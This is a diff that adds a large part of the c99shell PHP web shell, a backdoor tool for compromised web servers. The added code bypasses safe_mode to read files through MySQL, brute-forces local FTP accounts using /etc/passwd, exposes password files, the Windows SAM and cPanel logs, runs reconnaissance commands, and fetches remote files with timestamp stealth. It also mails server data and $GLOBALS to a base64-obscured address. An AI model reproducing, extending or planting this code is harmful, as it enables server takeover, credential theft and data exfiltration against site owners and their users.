+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+} 
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This functions not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == "d") 
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} 
+if ($act == "security") 
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ } 
+ else 
+ { 
+  $v = $_SERVER["WINDIR"]."\repair\sam"; 
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} 
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ �.</font></b><br>";} 
+ } 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+} 
+if ($act == "mkfile") 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} 
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = "ls";} 
+} 
+if ($act == "encoder") 
+{ 
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></center></form>"; 
+} 
+if ($act == "fsbuff") 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == "chmod") 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == "delete") 
+{ 
+ $delerr = ""; 
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} 
+ } 
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} 
+ $act = "ls"; 
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
